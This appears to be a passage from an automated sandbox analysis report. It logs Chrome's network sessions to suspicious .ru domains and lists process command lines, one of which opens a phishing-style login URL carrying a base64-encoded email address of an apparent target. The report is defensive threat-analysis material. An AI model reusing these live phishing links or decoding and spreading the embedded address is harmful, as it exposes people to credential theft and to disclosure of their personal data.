                                                                cf-chl-out: lolj5fylTJWyqmUtw3LJQ/9v7VymFwoDssvthP2UqCgLVof34eouUexZOuZpVRgIFNOzl344JvH8IallZapVKA==$UmME/+q2kr4R4L7HHE5RQA==
                                                                Server: cloudflare
                                                                CF-RAY: 8fffc2ee4df10f3b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-10 21:29:15 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                Data Ascii: {"err":100230}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.849752104.21.96.14431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:15 UTC680OUTGET /3671221770088554468995aJnxdglUKIEAPHRQJZVOEQDFDAWGIPHZAASEPLGEBBLDIFXAXHTEXGROCEYQWNX HTTP/1.1
                                                                Host: itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Origin: https://a89.softevol.ru
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://a89.softevol.ru/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:15 UTC892INHTTP/1.1 200 OK
                                                                Date: Fri, 10 Jan 2025 21:29:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pq1Z7kkCJ%2F73YJzyjDgA3sRu7mpoaI2%2B2VvCmteyU2m8h%2BjqdySSqz7%2BVnbAcRb0jMdrNNL55rRjuU28dQzQtT5gpw1maiMXdD%2FHszw9ASVF5zK1NBJjb70SHxpQw7NgDNr1b3SQgZAKqjRdfygNsRxEUJNOMT39id1Z4pmOZYUxa3gFOtgYBPjbrQdGOi7tn92j%2Fud2"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8fffc2ee3b41de9a-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1708&rtt_var=845&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1258&delivery_rate=1709601&cwnd=209&unsent_bytes=0&cid=67e5720aa58f0b87&ts=555&x=0"
                                                                2025-01-10 21:29:15 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                Data Ascii: 11
                                                                2025-01-10 21:29:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.849756104.21.16.14431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:17 UTC476OUTGET /3671221770088554468995aJnxdglUKIEAPHRQJZVOEQDFDAWGIPHZAASEPLGEBBLDIFXAXHTEXGROCEYQWNX HTTP/1.1
                                                                Host: itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:17 UTC902INHTTP/1.1 200 OK
                                                                Date: Fri, 10 Jan 2025 21:29:17 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aw183P06R%2BZBzsnwoW0W66UGkDmenGU6Hsj88flQVr%2FyhBk8%2F9dILOB%2Fag%2BhbE1ZRF%2FEDG8peIB6DAD4Jzlls%2BxQ4u3mXInFsdT%2FkytZ1RA47OlbmplP7oh4Jy0ixVfxm5agM0C81ZVkX34wyjd%2BnbhnG7VK9SK1%2FCvqOZKedFvJ22baRREV%2FRWIEbRfYZU1W2rikTgY"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8fffc2fa6c3841ba-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1757&rtt_var=690&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1054&delivery_rate=1551540&cwnd=192&unsent_bytes=0&cid=52f492aaae202f7e&ts=549&x=0"
                                                                2025-01-10 21:29:17 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                Data Ascii: 11
                                                                2025-01-10 21:29:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:16:28:46
                                                                Start date:10/01/2025
                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                Imagebase:0x7ff678760000
                                                                File size:3'242'272 bytes
                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:2
                                                                Start time:16:28:50
                                                                Start date:10/01/2025
                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1904,i,14409265588798062167,10844592103582673864,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                Imagebase:0x7ff678760000
                                                                File size:3'242'272 bytes
                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:3
                                                                Start time:16:28:56
                                                                Start date:10/01/2025
                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://@1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ="
                                                                Imagebase:0x7ff678760000
                                                                File size:3'242'272 bytes
                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                No disassembly